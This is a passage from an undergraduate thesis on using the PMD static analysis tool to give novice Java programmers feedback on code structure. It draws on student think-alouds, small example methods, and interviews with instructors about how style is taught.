Usability .................................................................................................................. 14
Relationship Between Problem-Solving Approach and the Pattern Produced .... 15
Attitudes .................................................................................................................. 18
About Style .............................................................................................................. 18
About the Tool ........................................................................................................ 19
Additional Observations ......................................................................................... 19
THINK-ALOUD DISCUSSION ................................................................................. 22
Instruction Recommendations ............................................................................... 22
Tool Design Recommendations ............................................................................ 23
INTERVIEW PARTICIPANTS AND METHODS ..................................................... 24
INTERVIEW RESULTS ............................................................................................ 26
How Do Instructors Teach, Evaluate, and Give Feedback on Style? ............... 26
Instructor Opinions on Style Instruction Over the Course of the Degree ............... 28
Do Instructors Perceive that Students Use These Patterns? Does It Matter to Them? ................................................................ 30
How Do Instructors Want to Use the Instructor-Facing Tool? ......................... 31
How do Instructors Want to Use the Student-Facing Tool? ........................... 31
INTERVIEW DISCUSSION ................................................................................................. 33
Using the Tool to Address Scalability Issues ......................................................... 33
Tool Design Recommendations ............................................................................ 35
Next Research Steps and Instructional Design Recommendations .................. 35
COMBINED DISCUSSION .............................................................................................. 38
Tool and Instructional Design Recommendations .............................................. 38
Next Research Steps ............................................................................................. 39
CONCLUSION ................................................................................................................. 41
APPENDIX: THINK-ALOUD TASKS ................................................................. 42
APPENDIX: CODING PATTERNS ............................................................................. 43
REFERENCES .............................................................................................................. 50
LIST OF FIGURES
Figure 1 An example of a coding pattern ................................................................. 1
Figure 2 Every issue that PMD flags in the input files becomes a row in the output table ......... 3
Figure 3 PMD's feedback appears in the source code editor and in a separate "Violations Outline" view in Eclipse ................................................ 3
Figure 4 A novice code structure commonly produced during the isStrictlyPositive task .......... 11
Figure 5 An interesting novice code structure that PMD was not programmed to detect ............ 12
Figure 6 Expert-structured code with logic that matches the okNotOk Javadoc .................... 12
Figure 7 A common implementation of okNotOk .................................................... 12
Figure 8 An interesting novice code structure that was produced by one participant during the okNotOk task ................................................... 12
Figure 9 An interesting novice code structure that PMD was not programmed to detect ............ 14
Figure 10 Expert-structured code with logic that matches the isStrictlyPositive Javadoc ........ 15
Figure 11 Participant 6 intentionally chose to assign the condition to a local variable rather than add a new if-statement ................................... 19
ACKNOWLEDGMENTS
I would like to gratefully acknowledge the support and funding I was awarded by the Undergraduate Research Opportunities Program to conduct this research.
I would like to express my deepest gratitude to Dr. Eliane Wiese for her truly stellar mentorship. I have grown so much, inspired by her example and supported at every turn by her freely given wisdom and energy. Thank you :)
I would like to thank all my professors in the School of Computing. I would like to especially thank Dr. Parker who recommended me to Dr. Wiese in the first place! I would also like to thank Jamie King for teaching me to care about code style.
I would like to humbly thank all members of the HCI Research Group and Dr. Kopta for their contributions, genuine enthusiasm, generously given time, and insightful feedback on the research.
Many thanks go to the interview and think-aloud participants and to the School of Computing staff who helped with the logistics of the interviews and think-alouds.
I would also like to thank my colleagues for the camaraderie and support throughout this journey. Special thanks go to my Senior Capstone Team!
I would like to thank my family who through their love and support and guidance smoothed out all the rough patches along the way.
Finally, I give my most heartfelt thanks to my husband. I am the lucky one.
INTRODUCTION
One important goal of writing a program is solving the programming task at hand. For novice programmers, sometimes this is the only goal [6]. On the other hand, maintaining and enhancing legacy code is far and away the dominant cost incurred during the life cycle of a successful software system [3]. Clearly, programmers must also pursue another goal: writing so that others can easily comprehend and modify the code in the future. Writing with good code structure in this sense is especially challenging for novices as their readability preferences tend to differ from experts’ preferences [12]. Research suggests that for certain coding patterns, students can comprehend both expert-structured and novice-structured programs equally well [12]. An example of a coding pattern the researchers examined is returning true or returning false instead of returning a condition directly (see Figure 1). Given that student comprehension was high for expert-structured and novice-structured code alike, Wiese et al. [12] concluded that it might be sufficient to detect novice patterns in student code and prompt the student to alter their implementation to improve its structure.
```java
if (array1[index1] == array2[index2]) {
    return false;
} else {
    return true;
}
```
Figure 1 An example of a coding pattern. Boolean literals are returned where the condition itself could be returned instead.
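For contrast, the expert revision of this pattern returns the condition itself. The sketch below places both forms side by side; the wrapper class and method names are invented for illustration, and the expert body negates the test so the two methods agree on every input:

```java
// Illustrative wrapper; only the method bodies matter for the pattern.
class BooleanReturns {
    // Novice structure from Figure 1: branch, then return Boolean literals.
    static boolean noviceDiffers(int[] array1, int index1, int[] array2, int index2) {
        if (array1[index1] == array2[index2]) {
            return false;
        } else {
            return true;
        }
    }

    // Expert structure: negate the test and return the condition directly.
    static boolean expertDiffers(int[] array1, int index1, int[] array2, int index2) {
        return array1[index1] != array2[index2];
    }
}
```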
One tool that could detect these kinds of patterns is PMD [5]. This tool is an Eclipse plug-in that statically analyzes Java code and flags lines of code that violate given code structure rules. This tool also has a batch-processing version that is run from the command line and can process source code across multiple packages and directories. While other code structure guideline tools exist, they are not targeted to catch novice coding patterns and provide examples and suggestions in a way that is useful to a novice programmer [12]. This extended version of PMD is the tool that was used in the student think-alouds, and the batch-processing version was used in the instructor interviews. See Figure 2 for an example of the output of the batch-processing version of PMD, and Figure 3 for an example of PMD's output in Eclipse that a student would see while programming.
Figure 2 Every issue that PMD flags in the input files becomes a row in the output table. As an example, the rows highlighted in this table correspond to the flagged code structure shown in the source code in Figure 3. This example also highlights a known problem where one pattern is flagged twice because two PMD rules overlap. The CS Education Rules category represents an extension of PMD [10].
Figure 3 PMD's feedback appears in the source code editor and in a separate "Violations Outline" view in Eclipse.
BACKGROUND AND RELATED WORK
Research suggests that novices tend to find novice-structured code more readable, even though they are capable of comprehending expert-structured code and novice-structured code equally well [12]. Why do students prefer to read and write in a novice-structured way when they are capable of comprehending expert-structured code? One hypothesis that may explain this mismatch is that if students do not completely understand what their program is supposed to achieve, or perhaps they aren’t familiar enough with the language to know what data structures and functions exist that could help them solve the problem in a simpler way, then they will write code that is unidiomatic to an expert [11]. Prompting students with actionable structure feedback while they are coding could help them more effectively learn these idioms, thereby addressing at least one of the issues that leads to novice-structured code.
Wiese et al. [13] did some initial exploration of the idea that simply prompting students with suggestions or examples might be sufficient to lead them to improve the structure of a piece of code. To explore this, they prompted students to edit existing code to improve its structure. They found that despite being able to recognize expert structure for a given pattern, for example, returning a Boolean condition directly instead of checking the condition and then returning Boolean literals, many students were not able to correctly revise novice-structured code. It’s possible that editing someone else’s code (as opposed to revising one’s own code) presented a barrier.
The form and level of feedback a student needs from an IDE is not the same as what a professional programmer needs. For example, when an error message is presented from the perspective of the IDE rather than the perspective of a student (e.g. “Error: expected x but found y”), the student may face a barrier to understanding and resolving it as they may not have an accurate mental model of the process by which their code was parsed to generate that message [8]. While other structure feedback tools besides PMD (2002) do exist, such as Style Avatar [7], FrenchPress [1], Submitty [9], and StyleCop [2], they do not detect all of the common novice patterns identified by Wiese et al. [12]. Wiese et al. [12] note that many current tools either focus on typographical issues only, or they target complex, project-scale concerns that are relevant only to experienced programmers. Another tool, AutoStyle [14] is targeted to the novice programmer, but in providing feedback it does not account for novice readability preferences.
RESEARCH QUESTIONS
A main research question addressed in this thesis is: could students benefit from a tool that can identify and flag poor code structure and provide hints or suggestions on how to improve it while they program? This question was investigated through think-alouds with ten students as they coded in Eclipse using PMD, a code structure analysis tool. One goal of the think-alouds was to see how students respond to and think about PMD-style feedback. PMD’s strong customizability and extensibility make it well-suited for supporting students as it can be tailored to their specialized needs.
The other main research question addressed is: can a batch-processing version of PMD help instructors quickly see and address the gaps in their students’ understanding? This question was addressed through interviews with four professors who teach introductory computer science courses.
THINK-ALOUD METHODS
Participants
Participants were recruited from the pool of students in CS 2420 and 3500 who had previously participated in a code structure study and had agreed to be contacted via email about a follow-up study. Think-aloud participants were compensated $15 for participating for one hour.
Methods
Think-aloud participants were provided the Eclipse IDE on a Mac computer, and Eclipse already had the PMD code checker plug-in installed. The tasks were prepared ahead of time and presented as a collection of method signatures, Javadoc comments describing what the method was supposed to do, and JUnit tests. The JUnit tests were not comprehensive, meaning that a student could pass all the tests without having completely fulfilled the requirements laid out in the Javadoc comments. To begin the think-aloud, students were told the task steps, which were coding, testing correctness, fixing bugs, checking style, and revising style. Students were also shown how to run the provided unit tests. Students were then provided a Java class with a method stub and instructed to implement the method according to the provided Javadoc comment. They were asked to think out loud while implementing the method as described in the Javadoc, and they were allowed to ask clarifying questions about the Javadoc as needed.
When they seemed to be finished coding, if they did not immediately run the JUnit tests themselves, they were prompted to run the tests. If the tests failed, they had to interpret the failure and resolve it. They were offered debugging assistance only if they got stuck. For example, a student who was out of ideas on how to diagnose the problem might be instructed to look at the relevant unit test or to put a breakpoint on the first line of the method and run the code in Debug mode.
When their implementation of the first method passed the unit tests, they were introduced to PMD and shown how to run it. They were told that PMD was a “style checker,” and each step of running it was explained out loud as it was run on their implementation: “Right-click on the Java file, go to PMD, and click on ‘Check Code.’” If PMD had feedback, the mouse was pointed at the in-line feedback, and the student was told that this was the feedback from PMD. For all subsequent methods that the student implemented, if they did not immediately run PMD on their code, they were prompted to run it. If PMD had no feedback but their implementation was novice-styled, they were prompted to revise their code style. If they stopped thinking out loud, they were prompted to voice their thoughts or opinions on what they were reading or doing, or they were asked to continue thinking out loud.
THINK-ALOUD RESULTS
This thesis includes analysis of two programming tasks where students were asked to implement code from scratch, test their implementation's correctness using provided unit tests, fix bugs caught by the tests, check their code's style using PMD, and finally revise their code's style based on PMD's feedback. There were additional programming tasks included in the think-aloud that are not analyzed in this thesis. Six students were asked to implement `isStrictlyPositive`, a method that returns true when the inputted int is positive (Appendix: Think-Aloud Tasks). This task targets the Simplify Boolean Returns pattern (Appendix: Coding Patterns). See Table 1 for a summary of PMD's expected and actual performance on each variation of the Simplify Boolean Returns pattern.
Table 1 PMD performed as expected in detecting one version of the Simplify Boolean Returns coding pattern. Not all versions targeted were generated by participants, and one version generated by a participant was completely unanticipated.
<table>
<thead>
<tr>
<th>Simplify Boolean Returns Versions (Appendix: Coding Patterns)</th>
<th>PMD Expected Performance</th>
<th>PMD Actual Performance</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version 1</td>
<td>PMD expected to detect.</td>
<td>Three participants produced. PMD did detect.</td>
</tr>
<tr>
<td>Version 2</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 3</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 4</td>
<td>Version not anticipated prior to think-aloud. PMD not programmed to detect.</td>
<td>One participant produced. PMD did not detect.</td>
</tr>
</tbody>
</table>
Of the six students who completed `isStrictlyPositive`, five were then asked to implement `okNotOk`. This is a method that returns "Ok" when the result of the first inputted int divided by the second inputted int is greater than or equal to seven and the product of the two inputted ints is greater than or equal to one hundred twenty-eight, but returns "Not Ok" otherwise. This task targets the Collapsible If Statements pattern (Appendix: Coding Patterns). See Table 2 for a summary of PMD's expected and actual performance on each variation of the Collapsible If Statements pattern.
**Tool Effectiveness**
*Students Produced Patterns the Tool Should Flag and the Tool Flagged Them Correctly*
PMD flagged the code for Participants 1, 3, and 4 in the `isStrictlyPositive` task; their code looked like Figure 4. The feedback it provided was the same for each of them: "Avoid unnecessary if..then..else statements when returning Booleans." For the `okNotOk` task, no participants produced the nested if-statement version of the Collapsible If Statement pattern that PMD is programmed to detect.
Table 2 No students generated the targeted versions of the Collapsible If Statement pattern. One version generated by three participants was completely unanticipated.
<table>
<thead>
<tr>
<th>Collapsible If Statements Versions (Appendix: Coding Patterns)</th>
<th>PMD Expected Performance</th>
<th>PMD Actual Performance</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version 1</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 2</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 3</td>
<td>Version not anticipated prior to think-aloud. PMD not programmed to detect.</td>
<td>Three participants produced. PMD did not detect.</td>
</tr>
</tbody>
</table>
Figure 4 A novice code structure commonly produced during the isStrictlyPositive task. Falls under the Simplify Boolean Returns novice pattern and was flagged by PMD.
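The revision that PMD's feedback points toward can be sketched as follows. This is an illustrative reconstruction (the wrapper class and parameter name are invented), not a participant's actual code:

```java
class StrictlyPositive {
    // Novice structure, as in Figure 4: branch, then return Boolean
    // literals. This is the shape PMD flags with "Avoid unnecessary
    // if..then..else statements when returning Booleans."
    static boolean isStrictlyPositiveNovice(int value) {
        if (value > 0) {
            return true;
        } else {
            return false;
        }
    }

    // Expert structure: the condition is returned directly.
    static boolean isStrictlyPositive(int value) {
        return value > 0;
    }
}
```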
Participants 1, 2, and 3 wrote code that looked like Figure 5 once they made their code pass the provided unit tests. This code does fall under the Collapsible If Statements pattern because the if-statements on lines 7 and 10 could be collapsed into a single if-statement, as in Figure 6. However, PMD is not yet programmed to detect this pattern the way it appeared in the students’ code, where the if-statements are consecutive.
Participants 5 and 6 initially wrote code that used good structure and was not flagged by PMD, but failed a provided unit test (see Figure 7). Participant 5 revised their code to use expert structure (similar to Figure 6). Their conditional had a bug, but it passed the provided unit tests. Participant 6 revised their code to look like Figure 8, which does not violate the Collapsible If Statement pattern and was not flagged by PMD, but still might not be considered idiomatic by experts.
Students’ Interpretations and Implementations of the Tool’s Feedback
Participants 1, 3, and 4 each received the same feedback for their initial isStrictlyPositive implementation (see Figure 4), but each of them had different interpretations of the feedback, which suggests that the current form and phrasing of the
Figure 5 An interesting novice code structure that PMD was not programmed to detect. Commonly produced during the okNotOk task. Falls under the Collapsible If Statements novice pattern and was pointed out to the student by the author.
```java
public static String okNotOk(int numTop, int numBot)
{
    if (numBot == 0) {
        return "Not Ok";
    }
    if ((numTop / numBot >= 7) && (numTop * numBot >= 128)) {
        return "Ok";
    }
    return "Not Ok";
}
```
Figure 6 Expert-structured code with logic that matches the okNotOk Javadoc.
```java
public static String okNotOk(int numTop, int numBot)
{
if (numBot != 0 && (numTop / numBot >= 7) && (numTop * numBot >= 128)) {
return "Ok";
}
return "Not Ok";
}
```
Figure 7 A common implementation of okNotOk. Throws an ArithmeticException (division by zero) when numBot is 0.
```java
public static String okNotOk(int numTop, int numBot)
{
if ((numTop / numBot >= 7) && (numTop * numBot >= 128)) {
return "Ok";
}
return "Not Ok";
}
```
Figure 8 An interesting novice code structure that was produced by one participant during the okNotOk task. Does not fall under any of the current patterns.
```java
public static String okNotOk(int numTop, int numBot)
{
boolean ok = (numBot != 0) && (numTop / numBot >= 7) && (numTop * numBot >= 128);
return ok ? "Ok" : "Not Ok";
}
```
feedback might be insufficient for a student who is unfamiliar with the code structure patterns used in this study. Participant 1 interpreted it correctly and confidently, Participant 3 interpreted it correctly but was not confident, and Participant 4 interpreted it incorrectly and confidently.
Participant 1 read the PMD feedback out loud, and then stopped talking. They were asked whether they could incorporate it into a revision. They said, “Yeah, I know what you want,” indicating that PMD had successfully alerted them to the structure issue and that they understood how to revise it based on PMD’s feedback. They revised their code successfully, saying, “I can just do this in one line…”
Participant 3 read PMD’s feedback silently. Then they said, “Hmm, yeah, ok, so I could probably just do something… else to make it shorter? I don't know,” suggesting that they were unsure what the problem was but they thought the code could be shorter if they somehow removed the “unnecessary if..then..else statements.” While they revised their code, they said, “That would do… the same thing, I guess,” indicating that they were unsure about the equivalency of their new solution and their original solution.
Participant 4 read the feedback out loud and without prompting or pausing, they continued, “Ok, so then… they say uh, how do you use the ternary operator?” suggesting that they thought the problem PMD was highlighting was the use of if-else statements when the actual problem was the returning of Boolean literals where a Boolean expression would suffice. They revised their implementation to use the ternary operator (Figure 9) and then ran PMD unprompted. The feedback disappeared, which was actually a false negative: PMD is not set up to detect ternary operators, but their code still exhibited the “unnecessary if..then..else” statements, just in compacted form.
Figure 9 An interesting novice code structure that PMD was not programmed to detect. Produced by one participant during the isStrictlyPositive task. Falls under the Simplify Boolean Returns pattern and was pointed out to the student by the author.
Usability
On the first task, isStrictlyPositive, participants 2, 5, and 6 received no feedback from PMD on their initial implementation. Their initial implementation (see Figure 4) exhibited expert structure. When they encountered this lack of feedback, they did not react at first, indicating that they did not realize that the tool had finished running. It was explained to them that the tool had finished running, and the lack of feedback meant that PMD had not flagged anything in their code.
On the second task, okNotOk, Participants 2 (Figure 5) and 6 (Figure 8) both ran the style checker unprompted after running the JUnit tests. When PMD showed no feedback, Participant 2 asked, “Is it done?” suggesting that even though the meaning behind the lack of feedback had been explained to them during the first task, it was still confusing to the student to see no indication that PMD had finished running. When PMD showed no feedback for Participant 6, they ran it again. When PMD still had no feedback, they said, “Well either it doesn't have any complaints or it's broken,” indicating that the lack of feedback was completely ambiguous to them, just as it was to Participant 2.
Participant 3 received feedback from PMD in the isStrictlyPositive task, and even after they modified their code to correctly address the style feedback (Figure 10),
```java
public static boolean isStrictlyPositive(int input)
{
return input > 0;
}
```
Figure 10 Expert-structured code with logic that matches the isStrictlyPositive Javadoc.
PMD’s feedback did not change when they ran it again. They did not react, suggesting that they were waiting for an indication that PMD had finished running. PMD had presented the same feedback because the participant had not saved their changes. This was explained to them and they saved it and ran PMD again, making the feedback disappear. The student said, “Ok, now it's ok, I think,” again suggesting that they were not completely sure what the PMD feedback or lack of feedback meant.
Relationship Between Problem-Solving Approach and the Pattern Produced
Participants 3 and 4 went back and forth between reading the Javadoc out loud and typing a small piece of their solution. For example, Participant 3 read out loud, “This method takes in a Boolean and returns an int.” The student then typed return false into the method body, saying, “So, ok, I'm just going to return false so I remember.” They continued reading, “‘Returns true if the following condition is met, the input is positive.’ So, I'll just say if input is greater than ... so if it is positive, so zero is not technically positive, so if input is greater than zero return true.” This direct, one-to-one translation of the Javadoc into logic indicates that these participants did not have a separate planning step where they considered multiple code structures and weighed their decision before finally choosing a particular structure. Of the three participants who initially produced a correct solution with novice structure, two coded with this one-to-one approach. Only one of the three (Participant 1) finished reading it first, saying, “Well the test is if the input is positive, so ‘if input greater than 0, return true’…” Then, examining the code and adding whitespace, they finished, “So the only other situation is to return false.” Even though they finished reading the Javadoc before they started typing, their words suggest that they were thinking of the problem as a direct translation from the Javadoc comment.
In contrast to the one-to-one approach, Participant 2 first read the Javadoc out loud from start to finish, and then started to type if(input > 0). As they were typing, they paused and said, “Well, actually, I’m rethinking this,” indicating that, even though their code was correct, they had noticed something about it that could be improved, and they understood how to make the improvement. They deleted what they had and typed return input > 0. This indicates that the student was aware of their code structure choices while they were drafting their solution; they spontaneously recognized and revised a structure issue without any external prompting. Participants 5 and 6 also produced correct, expert-structured code without feedback or prompting. They finished reading the Javadoc and then summarized it in their own words, indicating they had synthesized the meaning behind the requirements before typing their solution. For example, Participant 6 said, “Ok, so basically, literally all I’m going to do is return input strictly greater than zero.” They did hesitate when returning the Boolean expression. Participant 6 was unsure if parentheses were required, and Participant 5 was unsure whether the Boolean expression could be returned at all.
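Both hesitations concern plain Java syntax: a Boolean expression may be returned directly, and wrapping parentheses are optional and semantically identical. A minimal sketch (the class and method names are illustrative, not from the study materials):

```java
public class ReturnExpressionDemo
{
    // Returning the comparison directly is legal Java; no parentheses required.
    public static boolean isStrictlyPositive(int input)
    {
        return input > 0;
    }

    // Parentheses are also legal, and the two forms are equivalent.
    public static boolean isStrictlyPositiveParens(int input)
    {
        return (input > 0);
    }
}
```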
For the okNotOk task, Participants 3 and 4 coded with the same approach as before, reading a little bit of the Javadoc, typing a literal translation of what they’d read, and repeating this cycle until they finished reading and implementing the Javadoc. Participant 1 stated that they were, “going with [their] first instincts,” suggesting that even though they finished reading the Javadoc before they started typing, they were not engaging in planning or revising steps. Participant 2 read the Javadoc out loud, then started coding, saying, “Ok, um, so I'm gonna calculate the result first, int result... well, maybe I don't need to do that. I am overthinking this,” suggesting that they were going through a planning and revising stage in their head. Only Participant 2 passed all the unit tests in their first attempt (Figure 5).
The other four participants’ initial implementations (Figure 7) failed the test that exercised their code’s handling of the case where the argument for the parameter numBot was zero. This case led to a zero in the denominator of a division operation for the participants who failed this test, causing an ArithmeticException to be thrown, which is not aligned with the instructions in the Javadoc comment. Participant 6 read the test results and began to think out loud, planning two different potential structures for their solution, which suggests that style is important to them and that planning is an integral part of their process. Figure 8 shows Participant 6’s final implementation. Participants 1 and 3 both revised their code to look like Figure 5, and commented on their code structure as they were revising, saying, “there is probably a more efficient way to do this,” and “I don't like that this is in there twice, but... off the top of my head I can't think of a better way to do this,” suggesting that they both recognized that there were style issues but did not feel confident about addressing them before validating their code’s correctness.
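The failing behavior comes from Java's integer division semantics: dividing an int by zero throws an ArithmeticException at runtime. A small sketch (the helper below is hypothetical, not the participants' code):

```java
public class DivisionByZeroDemo
{
    // Returns true if top / bot can be computed. In Java, integer division
    // by zero throws ArithmeticException at runtime.
    public static boolean divisionSucceeds(int top, int bot)
    {
        try {
            int quotient = top / bot;   // throws ArithmeticException when bot == 0
            return true;
        } catch (ArithmeticException e) {
            return false;
        }
    }
}
```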
Attitudes
About Style
After being prompted, Participant 2 thought out loud about the style of their okNotOk implementation (Figure 5) which used two consecutive if-statements that could have been collapsed into a single statement, a version of the Collapsible If Statement pattern, concluding, “I tend to think of error checking as its own kind of if statement and then anything that's method specific is its own if statement itself ’cause any error checking you're gonna wanna automatically return or throw an exception, so I tend to think of them in two separate realms, I guess.” This is important because it suggests that it's possible for students to develop their own structural idioms and to have a sophisticated intent behind their style choices that needs to be respected and not arbitrarily “corrected.” Along the same lines, when Participant 6 was asked how they chose one implementation over another while they were planning, they explained, “I prefer code that is more concise, and just adding this [assignment to a local variable], which is maybe 10 characters, as opposed to adding a new [statement]- the weight of a [statement] is more than the weight of characters within a [statement].” See Figure 11 for a highlighted example that calls out the assignment in the code that the student referenced. Once again, these two students’ responses together suggest that students may develop their own meaningful, structural idioms and guidelines, though the code structures they produce may look nothing alike and may not use expert structure.
Figure 11 Participant 6 intentionally chose to assign the condition to a local variable rather than add a new if-statement.
About the Tool
When being introduced to PMD, Participant 4 was told, “We have something here that checks code style,” to which they said, “Oh really? That's really cool!” indicating that they were enthusiastic about the concept. Participant 3 ran PMD again after their structure revisions, unprompted, saying, “Let's see if PMD still likes me.” PMD had no feedback, and observing this, the student said, “Seems like it does,” echoing the way they had talked about PMD earlier in the task when they said, “If it yells at me that's ok.” The way they anthropomorphized PMD suggests they developed a certain rapport with it, even though they had only used it briefly. When Participant 4 revised their isStrictlyPositive implementation to use the ternary operator, they said, “well, ok. That should hopefully solve the feedback,” suggesting that they were thinking of the PMD feedback as a single, external problem that needed to be solved.
Additional Observations
After resolving PMD’s feedback for isStrictlyPositive, Participant 3 asked if the code runs slightly faster without the if-statement, showing an interest in the performance implications of code structure choices. After revising, Participants 1, 3, and 4 all made very similar statements, declaring that they were going to let the unit tests determine the correctness of their code for them. This marked an interesting shift in the writing process where their perception of the task seemed to change from “implement this method based on this Javadoc” to “pass these unit tests.” For example, one student said, “... I'm going to run the tests to see if it works.” Another took several tries to correct the error, and along the way, they would make a small change and then run the tests again without pausing to evaluate the correctness or style of the code themselves. This pattern is interesting because it might be indicative of student modes of interaction with the PMD style tool if it becomes ubiquitous in the same way unit tests have.
Participant 4 resolved PMD’s feedback for isStrictlyPositive by using a ternary operator (see Figure 9). Seeing the feedback disappear, they said, “So that made it work? I mean, it's cleaner code, so that makes sense,” suggesting that although they had correctly interpreted the disappearance of the feedback, they had also over-interpreted the false negative to reinforce their concept of cleaner code. They were then prompted to see if they could make the code even cleaner, to which they responded, “Oh! Yeah, I'm overcomplicating, aren't I?” Without any example or explanation, just a suggestion to try, they utilized the expert pattern and returned the Boolean expression directly, indicating that they had enough experience to identify and revise a structure issue using their own judgment when given a simple, generic prompt to improve their code.
Participant 1 was reminded that they had stated that they didn't like that they were returning “Not Ok” in two different places in the code for the okNotOk task. In response, the student revised their code, pointing out that they were making use of short-circuiting. Participant 3 was prompted similarly, and in response they started to brainstorm out loud, saying that they thought they could cover all the “Not Ok” cases in one if-statement and then return “Ok” in the else case.
Both participants revised their code to look like Figure 6 without any additional prompting. In both cases, this revision required them to flip the condition of their previous fix (so, `numBot != 0` instead of `numBot == 0`), suggesting that they were thinking about the correctness implications of their style revision, not carelessly moving chunks of code around.
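The reason the flipped condition is safe is Java's short-circuit `&&`: when `numBot != 0` evaluates to false, the division to its right is never executed, so no exception can be thrown. A sketch mirroring the structure of Figure 6 (assuming the thresholds given in that figure):

```java
public class ShortCircuitDemo
{
    // With numBot != 0 as the first operand, && short-circuits, so the
    // division numTop / numBot is never evaluated when numBot is 0.
    public static String okNotOk(int numTop, int numBot)
    {
        if (numBot != 0 && (numTop / numBot >= 7) && (numTop * numBot >= 128)) {
            return "Ok";
        }
        return "Not Ok";
    }
}
```

Calling this with a zero second argument returns "Not Ok" rather than throwing, which is the behavior the participants' revisions achieved.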
THINK-ALOUD DISCUSSION
Think-aloud results that were enriched when contextualized by the instructor interviews are addressed later in the Combined Discussion. Think-aloud results which were interesting and useful independent of the instructor interviews are analyzed here.
Instruction Recommendations
More of the students who read the entire Javadoc before coding produced correct, expert-structured code than did students who solved the tasks with a one-to-one approach (e.g. reading a line of the Javadoc and then writing a line of code). This suggests that instructors should emphasize the benefits and importance of coding in a systematic way with discrete steps, as part of teaching students to use good style. Some examples of systematic approaches that students used successfully during think-alouds were: saying pseudocode out loud before writing actual code, reading all available information and summarizing it, or explicitly formulating a starting point and an end point for the problem before defining the path of the solution.
Some students already care about style and have well-reasoned, sophisticated intent behind style choices, even those choices that contradict the expert code structures. On the other hand, some students seemed to just care about making PMD happy. They saw style as a personal preference, not as a vehicle for intent, and PMD’s feedback did not necessarily reshape their personal preferences. They simply made the necessary changes to make the feedback go away. It is important that instruction on style not be prescriptive. Some leeway needs to be afforded for thoughtfully argued style choices, and some instruction time may need to be devoted to introducing students to the idea that there are tangible arguments for writing code a certain way. For example, code structure carries meaning for the reader, and well-chosen structures can prevent or expose bugs.
Tool Design Recommendations
One student encountered a usability error where PMD did not re-run because they had not saved their changes. An experienced programmer encountering this issue would likely be able to narrow down the reason for this behavior, but for a novice programmer who is using PMD for learning, this is problematic. It was not apparent to them that the tool had not run, and the student was confused that their changes did not cause any changes in PMD’s feedback. This could be improved either with an error message, alerting the student to the fact that the tool had not run because they had not saved, or by providing the student some kind of very obvious visual cue when PMD does run, separate from the feedback.
INTERVIEW PARTICIPANTS AND METHODS
Instructors who have taught CS 1410, 2420, or 3500 were recruited for interviews. During recruitment, instructors were asked to bring the following to the interview: rubrics for two programming assignments where some aspect of programming other than functionality/performance was part of the rubric (one assignment from the beginning of the semester and one from the end, from their most recent offering of CS 1410 or 2420 or 3500); examples of anonymized assignments with low vs. high scores to demonstrate how the rubric was applied. Reviewing and discussing the rubrics was the first phase of the interview. Instructors were asked a mix of prepared questions and spontaneous follow-up questions, with the goal of understanding the instructor’s current process for grading and giving feedback on “style” and code structure in programming assignments, separately from their evaluation of the correctness of student code.
Following this, instructors were shown the novice coding patterns [12] (Appendix: Instructor Interview Coding Patterns Document). They were asked to identify which patterns were important to them as instructors and which patterns they observed in student code. Some patterns were presented and discussed without the concrete examples shown in the Appendix, but through discussion it was clear the instructors understood the code structures the pattern names referred to. Instructors then received a demo of the instructor-facing PMD command line tool which batch processes Java source code and outputs a file that contains details for every line of code that was flagged by PMD (see Figure 2). The instructors were asked to interpret the output of the tool, and they were asked a mix of prepared questions and spontaneous follow-up questions with the goal of gauging how the instructor might incorporate the tool into their grading and feedback process, how they would want to see the tool extended, and what feedback they had about the tool and its output.
Time and interest permitting, instructors also received a demo of the student-facing PMD Eclipse plug-in, and they were asked for their feedback on the usefulness of the tool, their thoughts on how they would like to see it extended, and their thoughts on how they might incorporate this tool in their teaching and feedback process. At the conclusion of the interview, instructors were given a final opportunity to critique the instructor-facing tool.
INTERVIEW RESULTS
How Do Instructors Teach, Evaluate, and Give Feedback on Style?
The instructors’ current processes for evaluating student code structure and style were the first focus of the interviews. Three of the four instructors interviewed provided at least two homework assignment rubrics that included at least one rubric item that focused on some aspect of the code other than correctness. These rubric items tended to be things like “Style & Design” or “Documentation & Style,” and students would earn points in these categories for things like following instructions to replace certain comments with specific information, using helper methods, including Javadoc comments on every method, class, and instance variable, using whitespace and brackets consistently, and including in-line comments where the code was “unusual or complex” (citing a rubric from CS 2420). The current rubrics do not explicitly address code structure, and all instructors noted that any specific feedback provided to the students regarding their code style and design was dependent on the judgement and time constraints of the TAs.
Although these code structures do not get addressed in assignment rubrics, instructors do spend time on them in lecture. Several instructors said that they code in front of the class during lectures, and as they’re going, they comment on why they’re choosing to structure their code a certain way. One instructor requires CS 1410 students to attend weekly group sessions where four students get together with a TA to look at examples of student code from the most recent assignment and discuss ways the code could be written more elegantly or could be improved to better express the underlying ideas.
All instructors noted that this kind of feedback and instruction is needed. One instructor noted that these structure issues “... may escape the autograder. The program is correct, but it is horrible.” Another instructor indicated that even though they lecture about these topics, “... this is a problem with a large CS course with complicated programs and a huge number of students. The students are able to write bad code that works, and the test cases will say ‘Good job. You get most of the credit.’” This seems to indicate that there’s a scalability barrier facing instructors and TAs when providing targeted feedback to students on their code structure choices.
While some instructors had better visibility than others into their students’ current mastery of these code structures and their progress, no instructors had precise, accurate visibility. When looking at the output from the instructor-facing PMD tool, one instructor was surprised when the percentage of students whose code was flagged by the tool was roughly double what they had estimated, suggesting that although instructors are aware that students are using these novice patterns, they might be underestimating how prevalent they are across the whole class. Another instructor said that they’ve surveyed their CS 1410 and CS 3505 classes about their preferences on the Simplify Boolean Returns pattern. They remarked that they were surprised to learn that half the students in CS 3505 still preferred the novice pattern. Again, this seems to show that instructors do not have an accurate sense of students’ progress with regard to style, that they have a tendency to underestimate the prevalence of these patterns, and that getting a clearer picture of what’s happening is interesting and important to them. Another instructor said that the large class sizes make it so that they do not actually look at student code, except in very rare cases, and they added that this was “sad,” again suggesting that understanding what students are doing is important to instructors, and instructors think it’s a problem that there’s currently no scalable way to do this.
Instructors currently teach style by demonstration, and they do not evaluate students’ use of code structure. They rely on TAs to use their judgement to grade and give feedback on aspects of style such as whitespace, comments, and brace placement. Scalability is a barrier to accurately perceiving student progress with regard to style.
Instructor Opinions on Style Instruction Over the Course of the Degree
